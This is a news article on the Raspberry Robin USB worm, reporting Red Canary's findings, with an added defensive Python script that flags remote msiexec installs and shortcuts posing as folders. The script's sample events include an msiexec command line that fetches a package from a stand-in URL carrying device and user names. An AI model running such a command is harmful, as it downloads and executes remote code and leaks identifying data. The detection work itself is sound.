A new Windows malware has surfaced online, running active malicious campaigns. Researchers found this malware as part of a malicious cluster of activity identified as “Raspberry Robin.” The malware exhibits worm functionalities and spreads via external USB drives.
“Wormable” Raspberry Robin Windows Malware Discovered
Researchers from Red Canary, a US-based cybersecurity firm, have shared details about a malicious cluster of activity dubbed “Raspberry Robin.” As elaborated in their post, this malicious campaign drops a Windows malware that spreads like a worm via external drives.
Briefly, the researchers first found this “malicious cluster of activity” in September 2021, and they observed further activity as recently as January 2022.
The malware has managed to stay under the radar, as evident from VirusTotal analysis showing few public reports. Nonetheless, it is actively targeting organizations.
This malware spreads to target computers via infected USB drives or other removable drives. The worm appears as a “.lnk” file posing as an otherwise legitimate folder on the USB drive, thus deceiving the victim into opening it. Once the infected drive is inserted into a system and the shortcut is opened, the malware runs and carries out its malicious activities according to the instructions it receives from its C&C server.
In addition, the malware also installs a malicious DLL file on the target system, presumably to achieve persistence.
The malware abuses legitimate Windows components throughout this process, such as Microsoft Standard Installer (msiexec.exe), and also uses TOR nodes. As stated in the post,
This activity cluster relies on msiexec.exe to call out to its infrastructure, often compromised QNAP devices, using HTTP requests that contain a victim’s user and device names. We also observed Raspberry Robin use TOR exit nodes as additional command and control (C2) infrastructure.
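Two of the behaviours described above lend themselves to simple endpoint checks: a shortcut on a removable drive that sits beside a same-named folder (the lure described earlier), and msiexec.exe being launched with an HTTP(S) URL as its package source (the egress path Red Canary describes). The following Python is an added example written for this article, not code from Red Canary or from the Raspberry Robin report; the process events and the USB directory listing are constructed samples, and the msiexec-with-URL rule is a triage heuristic of my own, not a signature from the report.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (not real telemetry). The fields
# mirror what a Sysmon/EDR process-creation record carries. The second event
# imitates the pattern the article describes: msiexec.exe fetching from a URL
# that carries a device name and user name (hostname/user here are made up).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\tool.msi" /qn',
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /q /i http://example.invalid:8080/ALICE-PC?alice",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Program Files\App\app.exe",
     "cmdline": r"app.exe --update https://updates.example.invalid/check",
     "parent": r"C:\Windows\explorer.exe"},
]

# Constructed directory listing of a removable drive: (path, is_directory).
SAMPLE_USB_LISTING = [
    (r"E:\Photos", True),
    (r"E:\Photos.lnk", False),
    (r"E:\Documents", True),
    (r"E:\notes.txt", False),
    (r"E:\Budget.lnk", False),
]

URL_RE = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)


def flag_msiexec_remote_installs(events):
    """Return msiexec.exe launches whose command line contains an HTTP(S) URL.

    Windows Installer accepts a URL as the package source, so msiexec can
    download and run a package on its own. Most endpoints never install
    software that way, so each hit is a triage candidate, not a verdict:
    check the parent process, the destination, and whether the host name or
    user name appears in the request, as the article describes.
    """
    hits = []
    for ev in events:
        if PureWindowsPath(ev["image"]).name.lower() != "msiexec.exe":
            continue
        m = URL_RE.search(ev["cmdline"])
        if m:
            hits.append({"url": m.group(0),
                         "parent": ev["parent"],
                         "cmdline": ev["cmdline"]})
    return hits


def find_folder_impersonating_lnks(listing):
    """Return .lnk files that share a name with a directory at the same level.

    A shortcut placed next to a same-named folder is the lure pattern the
    article describes: with Explorer hiding known extensions, 'Photos' and
    'Photos.lnk' look alike, and opening the shortcut runs its target instead
    of opening the folder. A stray .lnk with no matching folder (Budget.lnk
    in the sample) is not flagged by this rule.
    """
    dirs = {str(PureWindowsPath(p)).lower() for p, is_dir in listing if is_dir}
    suspicious = []
    for path, is_dir in listing:
        p = PureWindowsPath(path)
        if is_dir or p.suffix.lower() != ".lnk":
            continue
        if str(p.with_suffix("")).lower() in dirs:
            suspicious.append(path)
    return suspicious


if __name__ == "__main__":
    for hit in flag_msiexec_remote_installs(SAMPLE_EVENTS):
        print("msiexec remote install:", hit["url"], "parent:", hit["parent"])
    for lnk in find_folder_impersonating_lnks(SAMPLE_USB_LISTING):
        print("shortcut posing as folder:", lnk)
```

Run against real data, the first function would take process-creation events exported from Sysmon (Event ID 1) or an EDR, and the second a listing produced by walking the root of a newly attached removable drive; both are cheap enough to run on every drive insertion and forward hits to a SIEM for review.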
It currently remains unclear how the malware reaches the external drives in the first place. Its subsequent activities and other processes, such as the intention behind the malicious DLL installation, are also yet to be deciphered. Hence, the threat actors behind this activity, their intentions, and their targets remain unknown.
For now, all users can do is avoid connecting external drives to their computers or devices unless they trust the source. While this is already a recommended best practice, Raspberry Robin makes it essential to enforce, especially in organizations.